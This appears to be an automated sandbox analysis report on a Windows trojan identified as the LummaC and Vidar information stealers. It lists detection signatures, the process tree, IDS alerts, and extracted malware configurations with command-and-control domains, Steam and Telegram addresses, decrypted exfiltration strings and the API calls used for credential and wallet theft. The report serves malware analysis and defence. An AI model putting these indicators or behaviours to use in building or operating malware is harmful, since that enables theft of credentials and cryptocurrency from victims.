Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe
Analysis ID:	1529305
MD5:	af5bfaa4908459155ade24245aab4a1b
SHA1:	9d816d1d533e0b29e3765a1c5b8aba8de69e2f0b
SHA256:	53c454d3daba412d544f91eddec97c12c12f0b16aa1aa1595527be78210fbfcf
Tags:	exe
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Found evasive API chain checking for user administrative privileges

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe" MD5: AF5BFAA4908459155ADE24245AAB4A1B)

MSBuild.exe (PID: 1568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 4788 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

AKEGIIJDGH.exe (PID: 6008 cmdline: "C:\ProgramData\AKEGIIJDGH.exe" MD5: F56A4A7B59E1E81087BB64A4A70FB32F)

MSBuild.exe (PID: 764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 5680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 2796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 300 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cmd.exe (PID: 6608 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFIJJEGHDAE" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6448 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "mathcucom.sbs", "ehticsprocw.sbs", "enlargkiw.sbs", "allocatinow.sbs", "condifendteu.sbs", "vennurviot.sbs"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/maslengdsa"], "Botnet": "8ecc9c7eaebfdf2a8cc0586d7419d6ea"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe PID: 4712	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 4788	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 4788	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 4788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 4788	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c6faf0.3.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c40000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe.c40000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4788, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49749

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:47:42.995479+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49886	188.114.96.3	443	TCP
2024-10-08T20:47:43.993818+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49894	188.114.96.3	443	TCP
2024-10-08T20:47:45.176633+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49902	188.114.97.3	443	TCP
2024-10-08T20:47:46.305352+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49911	104.21.33.249	443	TCP
2024-10-08T20:47:47.431215+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49917	172.67.205.156	443	TCP
2024-10-08T20:47:48.766658+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49923	172.67.140.193	443	TCP
2024-10-08T20:47:50.049508+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49936	104.21.79.35	443	TCP
2024-10-08T20:47:51.088531+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49942	188.114.96.3	443	TCP
2024-10-08T20:47:53.679779+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49957	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:47:42.995479+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49886	188.114.96.3	443	TCP
2024-10-08T20:47:43.993818+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49894	188.114.96.3	443	TCP
2024-10-08T20:47:45.176633+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49902	188.114.97.3	443	TCP
2024-10-08T20:47:46.305352+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49911	104.21.33.249	443	TCP
2024-10-08T20:47:47.431215+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49917	172.67.205.156	443	TCP
2024-10-08T20:47:48.766658+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49923	172.67.140.193	443	TCP
2024-10-08T20:47:50.049508+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49936	104.21.79.35	443	TCP
2024-10-08T20:47:51.088531+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49942	188.114.96.3	443	TCP
2024-10-08T20:47:53.679779+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49957	172.67.206.204	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:47:21.875917+0200	2044247	1	Malware Command and Control Activity Detected	95.164.90.97	80	192.168.2.5	49755	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:47:22.619086+0200	2051831	1	Malware Command and Control Activity Detected	95.164.90.97	80	192.168.2.5	49755	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:47:21.245058+0200	2049087	1	A Network Trojan was detected	192.168.2.5	49755	95.164.90.97	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T20:47:40.112889+0200	2803304	3	Unknown Traffic	192.168.2.5	49875	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/maslengdsa"], "Botnet": "8ecc9c7eaebfdf2a8cc0586d7419d6ea"}
Source: 11.2.AKEGIIJDGH.exe.d0000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "mathcucom.sbs", "ehticsprocw.sbs", "enlargkiw.sbs", "allocatinow.sbs", "condifendteu.sbs", "vennurviot.sbs"], "Build id": "H8NgCl--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\a43486128347[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\AKEGIIJDGH.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: drawwyobstacw.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: condifendteu.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: ehticsprocw.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: vennurviot.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: resinedyw.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: enlargkiw.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: allocatinow.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: mathcucom.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: drawwyobstacw.sbs
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -
Source: 0000000B.00000002.2532598685.00000000000FF000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	2_2_00411E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	2_2_0040A7AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	2_2_6C9E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6CBAA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBA44C0 PK11_PubEncrypt,	2_2_6CBA44C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB74420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6CB74420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBA4440 PK11_PrivDecrypt,	2_2_6CBA4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBF25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6CBF25B0

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49723 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.5:49911 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.5:49917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.5:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.5:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49957 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000002.00000002.2549762853.00000000387EE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000002.00000002.2543985847.000000002C902000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C5BFD4 FindFirstFileExW,	0_2_00C5BFD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040B914
